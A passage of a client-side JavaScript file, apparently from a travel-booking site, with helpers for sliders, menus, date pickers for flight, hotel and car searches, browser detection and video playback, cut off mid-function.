function getElement(elementId){
	if (document.getElementById){
	    return document.getElementById(elementId);
	}else{
	    return document.all[elementId];
	}
}

function emptyTextField(elementId, defaultText) {
    if (getElement(elementId) && (getElement(elementId).value == getElement(elementId).defaultValue)) {
        getElement(elementId).value = '';
    }
}

function checkEmail(elementID){
	var retVal = false;
	var str = getElement(elementID).value.trim().toLowerCase();
	var filter=/^([\w-]+(?:\.[\w-]+)*)@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$/i;
	if(str){
		if(filter.test(str)){
			getElement(elementID).value = str;
			retVal = true;
		}else{
			alert("Please enter a valid email address.");
			retVal = false;
		}
	}else{
		alert("Please enter a valid email address.");
		retVal = false;
	}
	return retVal;
}

function swapHotelImage(imgId){
	var arrayIndex = null;	
	imageArray = [];		
	for(i=0; i < imageArray.length; i++){
		if(imageArray[i].src){					
			if(imageArray[i].src.substr(imageArray[i].src.lastIndexOf("=") + 1) == imgId){
				arrayIndex = i;
				break;
			}
		}
	}
	if(arrayIndex === null){
		var oImage = new Image();
		oImage.src = "/utility/hotelimg.aspx?imagetype=1&imageid=" + imgId;
		getElement("fullimg").setAttribute("src", oImage.src);
		imageArray.push(oImage);
	}else{										
		getElement("fullimg").setAttribute("src", imageArray[arrayIndex].src);
	}
}

function bookmarkPage() {
    url = window.location;
    title = document.title;
    if((navigator.appName == "Microsoft Internet Explorer") && (parseInt(navigator.appVersion) >= 4)) {
        window.external.AddFavorite(url, title);
    } else if(navigator.appName == "Netscape") {
        window.sidebar.addPanel(title, url, "");
    } else {
        alert("Press CTRL-D (Netscape) or CTRL-T (Opera) to bookmark this page");
    }
}

var currentOfferDisplayId = 1;

function showOfferDetails(id, index) {

    if (getElement(id)) {
        getElement('offersholder').style.height = '124px';
        getElement(id).style.height = '119px';
    }

    var pagingLinksArray = getElement('paginglinks').getElementsByTagName('a');
    for (var i = 0; i < pagingLinksArray.length; i++) {
        pagingLinksArray[i].style.fontWeight = 'normal';
    }
    getElement('paginglink_' + index).style.fontWeight = 'bold';

    if (index > currentOfferDisplayId) {
        $("#offersholder").animate({ "left": "-=" + parseFloat(327.95 * parseFloat(index - currentOfferDisplayId)) + "px" }, 1000);
        currentOfferDisplayId = index;
    } else if (index < currentOfferDisplayId) {
        $("#offersholder").animate({ "left": "+=" + parseFloat(327.95 * parseFloat(currentOfferDisplayId - index)) + "px" }, 1000);
        currentOfferDisplayId = index;
    }
}


function showHeaderOfferDetails(id, index) {

    var pagingLinksArray = getElement('paginglinks').getElementsByTagName('a');
    /* THE WIDTH INCLUDES PADDING AND MARGIN */
    var offerHolderWidth = 315;
    var offerHolderId;

    for (var i = 0; i < pagingLinksArray.length; i++) {
        pagingLinksArray[i].style.fontWeight = 'normal';
        pagingLinksArray[i].style.color = 'white';
    }

    getElement('paginglink_' + index).style.fontWeight = 'bold';
    getElement('paginglink_' + index).style.color = '#EA8533';

    if (index == 1) {
        $("#offersholderpanel").animate({ "left": 0 + "px" }, 1000);
        currentOfferDisplayId = index;
    } else if (index > currentOfferDisplayId) {
        $("#offersholderpanel").animate({ "left": "-" + parseFloat(offerHolderWidth * parseFloat(index - 1)) + "px" }, 1000);
        currentOfferDisplayId = index;
    } else if (index < currentOfferDisplayId) {
        $("#offersholderpanel").animate({ "left": "+=" + parseFloat(offerHolderWidth * parseFloat(currentOfferDisplayId - index)) + "px" }, 1000);
        currentOfferDisplayId = index;
    }

}

function showHotelHeaderOfferDetails(id, index) {

    var pagingLinksArray = getElement('hotelpaginglinks').getElementsByTagName('a');
    /* THE WIDTH INCLUDES PADDING AND MARGIN */
    var offerHolderWidth = 355;

    for (var i = 0; i < pagingLinksArray.length; i++) {
        pagingLinksArray[i].style.fontWeight = 'normal';
        pagingLinksArray[i].style.color = 'white';
    }

    function $() {
        var elements = [];
        for (var i = 0; i < arguments.length; i++) {
            var element = arguments[i];
            if (typeof element === 'string')
                element = document.getElementById(element);
            if (arguments.length === 1)
                return element;
            elements.push(element);
        }
        return elements;
    }

    getElement('paginglink_' + index).style.fontWeight = 'bold';
    getElement('paginglink_' + index).style.color = '#EA8533';

    /* THIS HAS BEEN ADDED SO THERE IS NO CONFLICT WITH THE $ FUNCTION */
    (function ($) {
        if (index == 1) {
            $("#offershotelpanel").animate({ "left": 0 + "px" }, 1000);
            currentOfferDisplayId = index;
        } else if (index > currentOfferDisplayId) {
            $("#offershotelpanel").animate({ "left": "-" + parseFloat(offerHolderWidth * parseFloat(index - 1)) + "px" }, 1000);
            currentOfferDisplayId = index;
        } else if (index < currentOfferDisplayId) {
            $("#offershotelpanel").animate({ "left": "+=" + parseFloat(offerHolderWidth * parseFloat(currentOfferDisplayId - index)) + "px" }, 1000);
            currentOfferDisplayId = index;
        }

    })(jQuery);

}


function expandOfferDetails(id) {
    var numericId;
    if (id.length > 0) {
        numericId = id.split('_')[1];
    }
    if (getElement(id)) {
        if (getElement(id).style.height == '100%') {
            $("#offersholder").animate({ height: "124px" }, 500);
            $("#" + id).animate({ height: "119px" }, 500);
            getElement('more_' + numericId).innerText = 'Read more';
        } else {
            getElement('offersholder').style.height = '100%';
            getElement(id).style.height = '100%';
            getElement('more_' + numericId).innerText = 'close';
        }
    }
}

function showMoreTours(id, id2) {
    if (getElement(id)) {
        if (getElement(id).style.height == '100%') {
            getElement(id).style.height = '53px';
            getElement(id2).innerText = 'More tours';
        } else {
            getElement(id).style.height = '100%';
            getElement(id2).innerText = 'Close';
        }
    }
}

function showTourDetails2(direction) {

    var str;
    var indexOfComma;
    var indexOfBracket;
    var id;
    var pagingLinksArray = getElement('tourpaginglinks').getElementsByTagName('a');

    $("#touroffersholder")[0].style.width = parseFloat(326.99 * pagingLinksArray.length) + 326 + "px";

    for (var i = 0; i < pagingLinksArray.length; i++) {
        
        pagingLinksArray[i].getElementsByTagName('img')[0].style.border = 'none';
    }

    if (direction == 'right') {

        if (currentTourDisplayId != 1) {
            index = currentTourDisplayId + 1;
        } else {
            index = currentTourDisplayId;
        }

        if (index === -1 || index - 1 === 0 || index === 0) {
            // IF INDEX IS 0 OR 1 WE WANT THE NEXT IMAGE TO BE 2 (ROBCAHOON)
            getElement('tourpaginglink_' + 2).getElementsByTagName('img')[0].style.border = 'solid 1px black';
            index = 2;
        } if (index - 1 == pagingLinksArray.length) {
            // IF WE ARE AT THE FINAL IMAGE DON'T GO ANY FURTHER (ROBCAHOON)
            getElement('tourpaginglink_' + pagingLinksArray.length).getElementsByTagName('img')[0].style.border = 'solid 1px black';
            index = pagingLinksArray.length;
        } else {
            //SCROLL THROUGH 1 IMAGE AT A TIME (ROBCAHOON)
            getElement('tourpaginglink_' + index).getElementsByTagName('img')[0].style.border = 'solid 1px black';

        }

        currentPosition = $("#touroffersholder")[0].style.left;
        currentPosition = -parseFloat(326.99 * parseFloat(index - currentTourDisplayId));
                           
        if (newPosition === 0) {
            newPosition = currentPosition;
        } else {
            newPosition = newPosition + currentPosition;
        }

        if (index == 1) {
            newPosition = 0;
        }

        if (index == 13 || index == 25 || index == 37 || index == 49 || index == 61 || index == 73 || index == 85) {
            //SCROLL THE WHOLE SLIDER (ROBCAHOON)
            scrollTourPaging('left');

            for (var idx = index - 1; idx < (index - 1) + 12; idx++) {
                if (i < pagingLinksArray.length) {
                    str = pagingLinksArray[idx].href;
                    indexOfComma = str.indexOf(",");
                    indexOfBracket = str.indexOf("(");
                    id = str.substring(indexOfBracket + 1, indexOfComma);

                    var element;
                    var elementChildImg;

                    if (document.getElementById("tour_" + id)) {
                        element = document.getElementById("tour_" + id);

                        elementChildImg = element.getElementsByTagName('img');

                        if (elementChildImg) {
                            elementChildImg[0].src = '/utility/tourimg.aspx?indeximg=' + id;
                        }

                    }
                }
                
            }

        }

        $("#touroffersholder").animate({ "marginLeft": +newPosition + "px" }, 1000);
        currentTourDisplayId = index;
        index = index + 1;
    } else {

        if (currentTourDisplayId != 1) {
            index = currentTourDisplayId + 1;
        } else {
            index = currentTourDisplayId;
        }

        index = index - 1;
        if (index === -1 || index - 1 === 0 || index === 0) {
            // AS WE ARE GOING BACKWARDS ON THE IMAGES WE DO WANT IT TO GO BACK TO 1 (ROBCAHOON)
            getElement('tourpaginglink_' + 1).getElementsByTagName('img')[0].style.border = 'solid 1px black';
            index = 1;
        } else {
            // JUST SCROLL BACK THROUGH THE IMAGES 1 AT A TIME (ROBCAHOON)
            getElement('tourpaginglink_' + (index - 1)).getElementsByTagName('img')[0].style.border = 'solid 1px black';
        }

        currentPosition = $("#touroffersholder")[0].style.left;
        currentPosition = parseFloat(326.99 * parseFloat(index + 1 - currentTourDisplayId));

        if (newPosition === 0) {
            newPosition = currentPosition;
        } else {
            newPosition = newPosition + currentPosition;
        }

        if (index == 1 || index - 1 == 1) {
            newPosition = 0;
            currentTourDisplayId = 2;
        }

        if (index == 12 || index == 25 || index == 36 || index == 48 || index == 60 || index == 72 || index == 84) {
            //SCROLL THE WHOLE SLIDER
            scrollTourPaging('right');            
        }
        
        $("#touroffersholder").animate({ "marginLeft": +newPosition + "px" }, 1000);
        currentTourDisplayId = currentTourDisplayId - 1;
    }

}

var currentTourDisplayId = 1;
var currentPosition;
var newPosition = 0;

function showTourDetails(id, index) {

    var pagingLinksArray = getElement('tourpaginglinks').getElementsByTagName('a');

    for (var i = 0; i < pagingLinksArray.length; i++) {
        pagingLinksArray[i].getElementsByTagName('img')[0].style.border = 'none';
    }

    getElement('tourpaginglink_' + index).getElementsByTagName('img')[0].style.border = 'solid 1px black';

    $("#touroffersholder")[0].style.width = parseFloat(326.99 * pagingLinksArray.length) + 326 + "px";

    currentPosition = $("#touroffersholder")[0].style.left;
    currentPosition = -parseFloat(326.99 * parseFloat(index - currentTourDisplayId));

    if (newPosition === 0) {
        newPosition = currentPosition;
    } else {
        newPosition = newPosition + currentPosition;
    }

    if (index == 1) {
        newPosition = 0;
    }

    $("#touroffersholder").animate({ "marginLeft": +newPosition + "px" }, 1000);
    currentTourDisplayId = index;

}

var currentScrollTourPage = 1;

function scrollTourPaging(direction) {
    var toursPerPage = 11;
    var pagingLinksArray = getElement('tourpaginglinks').getElementsByTagName('a');
    var maxNumberOfPages = Math.ceil(pagingLinksArray.length / toursPerPage);

    if (direction == 'left' && currentScrollTourPage < maxNumberOfPages) {
        $("#tourpaginglinks").animate({ "left": "-=286px" }, 1000);
        currentScrollTourPage += 1;
    } else if (direction == 'right' && currentScrollTourPage > 1) {
        $("#tourpaginglinks").animate({ "left": "+=286px" }, 1000);
        currentScrollTourPage -= 1; 
    }
}

if (window.addEventListener) { //EXECUTED ON WINDOW LOAD/UNLOAD EVENT. ATTEMPTS FF/MOZ ETC THEN IE THEN OVERIDES window.onload/unload EVENTS
    window.addEventListener('load', function() { windowLoadEvents(); }, false);
} else if (window.attachEvent) {
    window.attachEvent('onload', windowLoadEvents);
} else {
    window.onload = function() { windowLoadEvents(); };
}

function windowLoadEvents() {
    
    //PLEASE KEEP CODE IN HERE TO A MINIMUM - CALL FUNCTIONS WHERE POSSIBLE

    querySt();

    toggleMenuElementsOnPageLoad();

    loadExternalJavascriptFiles();

    //prepareBusinessClassFlightsPage();
}

function loadExternalJavascriptFiles() { 
    
    //loadScript('url-to-load', callback-function); DO *NOT* USE PARENTHESES WITH THE CALLBACK FUNCTION OR YOU WILL EXECUTE IT RATHER THAN PASS IT IN AS AN ARGUMENT

}

function loadScriptWithCallback(urlToLoad,callbackFunction) {
    function scriptOnload() {
        this.onreadystatechange = null;
        this.onload = null;
        window.setTimeout(callbackFunction, 20);
    }
    var loadScriptHandler = function() {
        var rs = this.readyState;
        if (rs == 'loaded' || rs == 'complete') {
            scriptOnload();
        }
    };
    var script = document.createElement('script');
    script.type = 'text/javascript';
    if (callbackFunction) {
        //HOOK INTO BOTH POSSIBLE EVENTS
        script.onreadystatechange = loadScriptHandler;
        script.onload = scriptOnload;
    }
    script.src = urlToLoad;
    document.getElementsByTagName('head')[0].appendChild(script);
}

function toggleMenuElementsOnPageLoad() {

    var index = window.location.href.indexOf('#');

    if (index > -1 && index === (window.location.href.length - 1)) {
        showelement('ctl00_menu_menulist');
    }

}

function showreview(id) {
    if (getElement(id)) {
        if (getElement('morereviews')) {
            getElement('morereviews').style.display = "block";
        }
        getElement(id).style.display = "block";
    }
}
function closereview(id) {
    if (getElement(id)) {
        if (getElement('morereviews')) {
            getElement('morereviews').style.display = "none";
        }
        getElement(id).style.display = "none";
    }
}

var previousElement = null;
var previousClickedElement = null;

function showelement(id) {
    if (getElement(id)) {

        getElement(id).style.display = "block";

        if (id.substring(0, 7) === 'submenu') {
            if (getElement('ctl00_menu_menulist')) {
                getElement('ctl00_menu_menulist').style.display = "none";
            }

            //getElement('link' + id).style.color = '#fa851c';
            if (id.split('_')[1] != '954') {
                getElement('link' + id).style.left = '-10px';
            }

            if (previousElement) {
                if (previousElement.id != id) {
                    previousElement.style.display = "none";
                }
            }

            previousElement = getElement(id);
        }
    }
    return false;
}

function preventNav(id) {
    if ((!previousClickedElement || id != previousClickedElement.id) && ('ontouchstart' in document || navigator.userAgent.toLowerCase().indexOf('mobile') > -1)) {
        previousClickedElement = getElement(id);
        try {
            event.returnValue = false;
            event.preventDefault();
            return false;
        } catch (err) { }
    }
}

function subMenuDisplayOnIphone(id) {

    if (getElement(id).style.display === "block" || getElement(id).style.display === '') {
        getElement(id).style.display = 'none';
    } else {
        getElement(id).style.display = 'block';
    }

}

function toggleSubMenu(id) {

    document.getElementById(id).style.display = 'none';

}

//function reloadPageAndMenu() {

//    if (window.location.href.indexOf('#') > 0) {
//        window.location.href;
//    } else {
//        window.location.href += "#";
//    }
//    location.reload();

//}

function showSubMenu() {
    if (getElement('submenu2')) {
        getElement('submenu2').style.display = "block";
        if (previousElement) {
            //getElement('link' + previousElement.id).style.color = '#938b82';
        }

    }
}


function showelementDesign2(id) {
    if (getElement(id)) {
        getElement(id).style.display = "block";
        if (id.substring(0, 7) === 'submenu') {
            getElement('link' + id).style.color = '#FF9934';
            if (id.split('_')[1] != '954') {
                getElement('link' + id).style.left = '-10px';
            }
        }
    }
    return false;
}
function hideelement(id) {
    if (getElement(id)) {
        getElement(id).style.display = "none";
        if (id.substring(0, 7) === 'submenu') {
            if (getElement('submenu2')) {
                getElement('submenu2').style.display = "block";
            }
            //getElement('link' + id).style.color = '#938b82';
        }
    }
    return false;
}

function toggleElement(id, blockOrNone) {
    LotusGroup.DOM.toggleElementDisplay(id, blockOrNone);
    return false;
}

function getElementsByClass(searchClass, node, tag) {
    var classElements = [];
    if (node === null) {
        node = document;
    } else {
        node = $(node);
    }
    if (tag === null)
        tag = '*';
    var els = node.getElementsByTagName(tag);
    var elsLen = els.length;
    var pattern = new RegExp('(^|\\\\s)' + searchClass + '(\\\\s|$)');
    for (i = 0, j = 0; i < elsLen; i++) {
        if (pattern.test(els[i].className)) {
            classElements[j] = els[i];
            j++;
        }
    }
    return classElements;
}

var weekDays = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"];
function getElement(elementId) {
    if (document.getElementById) {
        return document.getElementById(elementId);
    } else {
        return document.all[elementId];
    }
}
function todayAsStringFromElement(day, monYear) {
    if (day.length > 0 && monYear.length > 0) {
        var year = monYear.substring(0, 4);
        var mon = monYear.substring(5) - 1;
        var myDate = new Date();
        myDate.setFullYear(year, mon, day);
        return weekDays[myDate.getDay()];
    }
}

function toggleSearchBoxes(showP, hide1P, hide2P, tab) {
    var show = getElement(showP);
    var hide1 = getElement(hide1P);
    var hide2 = getElement(hide2P);
    var searchTitle = getElement('ctl00_middleContent_multiSearch_searchTitle');
    if (show && hide1 && hide2) {
        show.style.display = 'block';
        hide1.style.display = 'none';
        hide2.style.display = 'none';
    }

    if (searchTitle) {
        searchTitle.innerHTML = searchTitle.innerHTML.replace("flights", "");
        searchTitle.innerHTML = searchTitle.innerHTML.replace("hotels", "");
        searchTitle.innerHTML = searchTitle.innerHTML.replace("cars", "");

        show.style.backgroundImage = 'url(/images/structure/searchbackgrounds.jpg)';

        switch (show.id) {
            case 'ctl00_middleContent_multiSearch_flightSearchHolder':
                getElement('choosesearchf').checked = true;
                searchTitle.innerHTML = searchTitle.innerHTML + ' flights';
                break;
            case 'ctl00_middleContent_multiSearch_hotelSearchHolder':
                show.style.minHeight = '208px';
                getElement('choosesearchh').checked = true;
                searchTitle.innerHTML = searchTitle.innerHTML + ' hotels';
                break;
            case 'ctl00_middleContent_multiSearch_carSearchHolder':
                show.style.minHeight = '208px';
                getElement('choosesearchc').checked = true;
                searchTitle.innerHTML = searchTitle.innerHTML + ' cars';
                break;
        }
    }
}

function todayAsString() {
    var today = new Date();
    return weekDays[today.getDay()];
}

var jqDP_DATE_FORMAT_STRING = 'dd/mm/yy';

function initDatePicker() {

    if (getElement('fsdepart') && getElement('fsreturn')) {
        $('#fsdepart').datepicker(
            {
                onSelect: function(dateText, inst) { dateSelectedNew(0, 'FLIGHTS'); }, 
                minDate: 1, //TODAY
                maxDate: 365, //1 YEAR IN THE FUTURE
                dateFormat: jqDP_DATE_FORMAT_STRING,
                prevText: 'Earlier',
                nextText: 'Later',
                duration: 10,
                gotoCurrent: true,
                numberOfMonths: 2,
                dayNamesMin: ["S", "M", "T", "W", "T", "F", "S"]
            }
        );
        $('#fsreturn').datepicker(
            {
                onSelect: function(dateText, inst) { dateSelectedNew(1, 'FLIGHTS'); },
                minDate: 1, //TODAY
                maxDate: 365, //1 YEAR IN THE FUTURE
                dateFormat: jqDP_DATE_FORMAT_STRING,
                prevText: 'Earlier',
                nextText: 'Later',
                duration: 10,
                gotoCurrent: true,
                numberOfMonths: 2,
                dayNamesMin: ["S", "M", "T", "W", "T", "F", "S"]
            }
        );
        if (getElement('fsdepartdaydepart_weekday')) { getElement('fsdepartdaydepart_weekday').innerHTML = $.datepicker.formatDate('DD', new Date($("#fsdepart").datepicker('getDate').getFullYear(), $("#fsdepart").datepicker('getDate').getMonth(), $("#fsdepart").datepicker('getDate').getDate())); }
        if (getElement('fsreturndayreturn_weekday')) { getElement('fsreturndayreturn_weekday').innerHTML = $.datepicker.formatDate('DD', new Date($("#fsreturn").datepicker('getDate').getFullYear(), $("#fsreturn").datepicker('getDate').getMonth(), $("#fsreturn").datepicker('getDate').getDate())); } 
    }
    if (getElement('hsarrival')) {
        $('#hsarrival').datepicker(
            {
                onSelect: function(dateText, inst) { dateSelectedNew(0, 'HOTELS'); },
                minDate: 1, //TODAY
                maxDate: 365, //1 YEAR IN THE FUTURE
                dateFormat: jqDP_DATE_FORMAT_STRING,
                prevText: 'Earlier',
                nextText: 'Later',
                duration: 10,
                gotoCurrent: true,
                numberOfMonths: 2,
                dayNamesMin: ["S", "M", "T", "W", "T", "F", "S"]
            }
        );
        getElement('hsdayarrival_weekday').innerHTML = $.datepicker.formatDate('DD', new Date($("#hsarrival").datepicker('getDate').getFullYear(), $("#hsarrival").datepicker('getDate').getMonth(), $("#hsarrival").datepicker('getDate').getDate())); 
    }
    if (getElement('csdepart') && getElement('csreturn')) {
       $('#csdepart').datepicker(
            {
                onSelect: function(dateText, inst) { dateSelectedNew(0, 'CARS'); },
                minDate: 1, //TODAY
                maxDate: 365, //1 YEAR IN THE FUTURE
                dateFormat: jqDP_DATE_FORMAT_STRING,
                prevText: 'Earlier',
                nextText: 'Later',
                duration: 10,
                gotoCurrent: true,
                numberOfMonths: 2,
                dayNamesMin: ["S", "M", "T", "W", "T", "F", "S"]
            }
        );
        $('#csreturn').datepicker(
            {
                onSelect: function(dateText, inst) { dateSelectedNew(1, 'CARS'); },
                minDate: 1, //TODAY
                maxDate: 365, //1 YEAR IN THE FUTURE
                dateFormat: jqDP_DATE_FORMAT_STRING,
                prevText: 'Earlier',
                nextText: 'Later',
                duration: 10,
                gotoCurrent: true,
                numberOfMonths: 2,
                dayNamesMin: ["S", "M", "T", "W", "T", "F", "S"]
            }
        );
        getElement('cspickupday_weekday').innerHTML = $.datepicker.formatDate('DD', new Date($("#csdepart").datepicker('getDate').getFullYear(), $("#csdepart").datepicker('getDate').getMonth(), $("#csdepart").datepicker('getDate').getDate()));
        getElement('csdropoffday_weekday').innerHTML = $.datepicker.formatDate('DD', new Date($("#csreturn").datepicker('getDate').getFullYear(), $("#csreturn").datepicker('getDate').getMonth(), $("#csreturn").datepicker('getDate').getDate()));
     }
}

function dateSelectedNew(id, type) {
    //console.log($.fn.jquery);
    var newDate;
    if (id === 0) {
        switch (type) {
            case 'FLIGHTS':
                newDate = new Date($("#fsdepart").datepicker('getDate').getFullYear(), $("#fsdepart").datepicker('getDate').getMonth(), $("#fsdepart").datepicker('getDate').getDate() + 7);
                $('#fsreturn').datepicker('option', 'defaultDate', $.datepicker.formatDate(jqDP_DATE_FORMAT_STRING, newDate));
                getElement('fsreturn').value = $.datepicker.formatDate(jqDP_DATE_FORMAT_STRING, newDate);
                if (getElement('fsdepartdaydepart_weekday')) { getElement('fsdepartdaydepart_weekday').innerHTML = $.datepicker.formatDate('DD', newDate); }
                if (getElement('fsreturndayreturn_weekday')) { getElement('fsreturndayreturn_weekday').innerHTML = $.datepicker.formatDate('DD', newDate); }
                break;
            case 'HOTELS':
                getElement('hsdayarrival_weekday').innerHTML = $.datepicker.formatDate('DD', new Date($("#hsarrival").datepicker('getDate').getFullYear(), $("#hsarrival").datepicker('getDate').getMonth(), $("#hsarrival").datepicker('getDate').getDate()));
                break;
            case 'CARS':
                newDate = new Date($("#csdepart").datepicker('getDate').getFullYear(), $("#csdepart").datepicker('getDate').getMonth(), $("#csdepart").datepicker('getDate').getDate() + 7);
                $('#csreturn').datepicker('option', 'defaultDate', $.datepicker.formatDate(jqDP_DATE_FORMAT_STRING, newDate));
                getElement('csreturn').value = $.datepicker.formatDate(jqDP_DATE_FORMAT_STRING, newDate);
                getElement('cspickupday_weekday').innerHTML = $.datepicker.formatDate('DD', newDate);
                getElement('csdropoffday_weekday').innerHTML = $.datepicker.formatDate('DD', newDate);
                break;
        }
    } else {
        switch (type) {
            case 'FLIGHTS':
                newDate = new Date($("#fsreturn").datepicker('getDate').getFullYear(), $("#fsreturn").datepicker('getDate').getMonth(), $("#fsreturn").datepicker('getDate').getDate());
                getElement('fsreturn').value = $.datepicker.formatDate(jqDP_DATE_FORMAT_STRING, newDate);
                if (getElement('fsreturndayreturn_weekday')) { getElement('fsreturndayreturn_weekday').innerHTML = $.datepicker.formatDate('DD', newDate); }             
                break;
            case 'HOTELS':
                break;
            case 'CARS':
                newDate = new Date($("#csreturn").datepicker('getDate').getFullYear(), $("#csreturn").datepicker('getDate').getMonth(), $("#csreturn").datepicker('getDate').getDate());
                $('#csreturn').datepicker('option', 'defaultDate', $.datepicker.formatDate(jqDP_DATE_FORMAT_STRING, newDate));
                getElement('csreturn').value = $.datepicker.formatDate(jqDP_DATE_FORMAT_STRING, newDate);
                getElement('csdropoffday_weekday').innerHTML = $.datepicker.formatDate('DD', newDate);
                break;
        }
    }
    
}

function setWeekDay(id, selectedDate) {
    var tempSelectedDate = null;
    if (getElement(id)) {
        try {
            tempSelectedDate = getDateFromIsoDateString(selectedDate);
        } catch (err) {
            tempSelectedDate = selectedDate;
        }
        getElement(id).innerHTML = weekDays[tempSelectedDate.getDay()];
    }
}

/* GENERIC BROWSER DETECTION FUNCTION */
var BrowserDetect = {
    init: function() {
        this.browser = this.searchString(this.dataBrowser) || "An unknown browser";
        this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version";
        this.OS = this.searchString(this.dataOS) || "an unknown OS";
    },
    searchString: function(data) {
        for (var i = 0; i < data.length; i++) {
            var dataString = data[i].string;
            var dataProp = data[i].prop;
            this.versionSearchString = data[i].versionSearch || data[i].identity;
            if (dataString) {
                if (dataString.indexOf(data[i].subString) != -1)
                    return data[i].identity;
            }
            else if (dataProp)
                return data[i].identity;
        }
    },
    searchVersion: function(dataString) {
        var index = dataString.indexOf(this.versionSearchString);
        if (index == -1) return;
        return parseFloat(dataString.substring(index + this.versionSearchString.length + 1));
    },
    dataBrowser: [
		{ string: navigator.userAgent,
		    subString: "OmniWeb",
		    versionSearch: "OmniWeb/",
		    identity: "OmniWeb"
		},
		{
		    string: navigator.vendor,
		    subString: "Apple",
		    identity: "Safari"
		},
		{
		    prop: window.opera,
		    identity: "Opera"
		},
		{
		    string: navigator.vendor,
		    subString: "iCab",
		    identity: "iCab"
		},
		{
		    string: navigator.vendor,
		    subString: "KDE",
		    identity: "Konqueror"
		},
		{
		    string: navigator.userAgent,
		    subString: "Firefox",
		    identity: "Firefox"
		},
		{
		    string: navigator.vendor,
		    subString: "Camino",
		    identity: "Camino"
		},
		{		// for newer Netscapes (6+)
		    string: navigator.userAgent,
		    subString: "Netscape",
		    identity: "Netscape"
		},
		{
		    string: navigator.userAgent,
		    subString: "MSIE",
		    identity: "Explorer",
		    versionSearch: "MSIE"
		},
		{
		    string: navigator.userAgent,
		    subString: "Gecko",
		    identity: "Mozilla",
		    versionSearch: "rv"
		},
		{ 		// for older Netscapes (4-)
		    string: navigator.userAgent,
		    subString: "Mozilla",
		    identity: "Netscape",
		    versionSearch: "Mozilla"
		}
	],
    dataOS: [
		{
		    string: navigator.platform,
		    subString: "Win",
		    identity: "Windows"
		},
		{
		    string: navigator.platform,
		    subString: "Mac",
		    identity: "Mac"
		},
		{
		    string: navigator.platform,
		    subString: "Linux",
		    identity: "Linux"
		}
	]

};
BrowserDetect.init();

function showTips(id, id2) {
    if (getElement(id)) {
        if (getElement(id).style.height == '100%') {
            getElement(id).style.height = 230 + 'px';
            getElement(id).style.width = 330 + 'px';
            getElement(id2).innerHTML = '<strong>read more</strong>';
            getElement(id).style.overflow = 'hidden';
            getElement('readmore').style.display = 'block';
            getElement('flightdeals').style.display = 'block';
            getElement('currentoffers').style.display = 'block';
            getElement('airlinenews').style.display = 'block';
            getElement('searchholder').style.display = 'block';
        } else {
            getElement(id).style.height = '100%';
            getElement(id).style.overflow = 'visible';
            getElement(id).style.width = 500 + 'px';
            getElement(id2).innerHTML = '<strong>close</strong>';
            getElement(id2).style.display = 'none';
            getElement('flightdeals').style.display = 'none';
            getElement('currentoffers').style.display = 'none';
            getElement('airlinenews').style.display = 'none';
            getElement('searchholder').style.display = 'none';
            
        }
    }
}

var player;
var previousEvent;
var videoText;
var redChairText;
var watchText;

function playerReady(evt) {
    player = document.getElementById(evt.id);
    player.addControllerListener('PLAY', 'play');
}

function clickListener(obj) {

    if (document.getElementById("ctl00_mainContent_videoText") !== null) {
        videoText = document.getElementById("ctl00_mainContent_videoText");
        watchText = document.getElementById("ctl00_mainContent_watchtext"); 
        if (videoText !== null) {
            videoText.style.display = "none";
            watchText.style.display = "none";   
        }
    } else if (document.getElementById("ctl00_mainContent_redChairText") !== null) {
        redChairText = document.getElementById("ctl00_mainContent_redChairText");
        if (redChairText !== null) {
            redChairText.style.display = "none";
        }
    }

    checkPlayer();
}

function play() {

    if (document.getElementById("ctl00_mainContent_videoText") !== null) {
        videoText = document.getElementById("ctl00_mainContent_videoText");
        watchText = document.getElementById("ctl00_mainContent_watchtext");
        if (videoText !== null) {
            videoText.style.display = "none";
            watchText.style.display = "none";
        }
    } else if (document.getElementById("ctl00_mainContent_redChairText") !== null) {
        redChairText = document.getElementById("ctl00_mainContent_redChairText");
        if (redChairText !== null) {
            redChairText.style.display = "none";
        }
    }

}


function checkPlayer() {
    if (previousEvent !== null) {
        if (previousEvent.id == 'ply') {
            previousEvent = player.sendEvent('PLAY');
        } else {
            previousEvent = player.sendEvent('STOP');
        }
    } else {
        previousEvent = player.sendEvent('PLAY');
    }

}


function loadVideo(w, h) {
    if (document.getElementById('html5video')) {
        document.getElementById('html5video').style.display = 'block';
        document.getElementById('html5video').style.marginBottom = '10px';
        document.getElementById('videostaticimage').style.display = 'none';
    } else if (document.getElementById('player')) {
        document.getElementById('player').style.display = 'block';
        document.getElementById('close').style.display = 'block';
        document.getElementById('player').style.width = w;
        document.getElementById('player').style.height = h;    
        flowplayer('player').play();
    }    
}

function closeVideo() {
    if (document.getElementById('player')) {
        document.getElementById('player').style.display = 'none';
        flowplayer('player').stop();
    } 
}

var calls = 0;

function scrollThumbs(direction, moveImgsBy) {

    var left = 0;
    var imgMoveBy;

    if (moveImgsBy) {
        imgMoveBy = moveImgsBy;
    } else {
        imgMoveBy = 4;
    }

    //Get our elements for faster access and set overlay width
    var div = $('div.sc_menu_mag'),
    ul = $('ul.sc_menu_mag');

    //Remove scrollbars
    div.css({ overflow: 'hidden' });

    if (direction === 'left') {
        calls++;
        left = ((85 * imgMoveBy) * (calls));
        if (left < ((ul.outerWidth() - div.outerWidth()) + 255)) {
            div.animate({ scrollLeft: left }, 'slow');
        } else {
            calls--;
        }
    } else if (direction === 'right') {
        if (calls > 0) {
            calls--;
            left = ((85 * imgMoveBy) * (calls));
            if (left < (ul.outerWidth() - div.outerWidth())) {
                div.animate({ scrollLeft: left }, 'slow');
            } 
        }
    }
    
    return false;
}


function scrollOfferThumbs(imgId) {

    var left = 0;
    var imgNumber;
    var scrollBy;

    imgNumber = imgId.indexOf('_');

    imgNumber = imgId.substring(imgNumber + 1, imgId.length);

    scrollBy = imgNumber / 8;
    scrollBy = Math.round(scrollBy);

    calls = scrollBy - 1;

    //Get our elements for faster access and set overlay width
    var div = $('div.sc_menu_mag'),
    ul = $('ul.sc_menu_mag');

    //Remove scrollbars
    div.css({ overflow: 'hidden' });

    left = ((85 * 8) * (calls));
    if (left < ((ul.outerWidth() - div.outerWidth()) + 255)) {
        div.animate({ scrollLeft: left }, 'slow');
    } 

    return false;
}


function showMoreInfo(contentId, linkId, minHeight, maxHeight) {
    if (getElement(contentId)) {
        if (typeof maxHeight != 'number') {
